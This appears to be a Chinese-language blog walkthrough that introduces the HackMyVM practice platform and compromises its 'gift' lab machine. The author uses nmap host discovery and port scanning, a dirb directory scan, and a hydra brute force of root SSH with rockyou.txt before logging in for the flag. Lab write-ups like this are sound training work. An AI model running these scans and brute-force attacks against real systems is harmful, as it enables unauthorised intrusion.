hackmyvm是一个平台,包含了大量靶机,类似于vulnhub、hackthebox等平台,你可以在上面下载靶机,进行渗透测试练习,非常适合热爱黑客技术或从事渗透测试的人员。
(这段解释参考这篇文章)
下载安装
(需要科学上网)
下载地址:https://hackmyvm.eu/machines/
进去之后注册登陆账号
点击machines,下载需要的虚拟机
靶机下载完成之后,导入VMware
但是导入过程中出现了下面的报错
重启电脑什么的也没用,应该是自己下的虚拟机有问题,于是我重新下载了个虚拟机,就可以成功运行了
靶机gift
因为靶机gift和kali都在VM中,所以将两者都改为nat模式。
打开kali
查看kali ip
ifconfig
查出来是192.168.25.139
靶机和kali都是nat模式,用nmap扫描同网段的存活主机,这样就可以找到靶机的ip
nmap -sP 192.168.25.0/24
查找靶机开放端口
nmap -A -p 1-1000 192.168.25.150
访问80端口
扫描目录,无果
dirb http://192.168.25.150
转战ssh,因为没有告诉靶机ssh密码信息,所以选择直接爆破
sudo hydra -l root -P /usr/share/wordlists/rockyou.txt -F ssh://192.168.25.150
有了密码之后,远程连接,拿到flag
ssh root@192.168.25.150
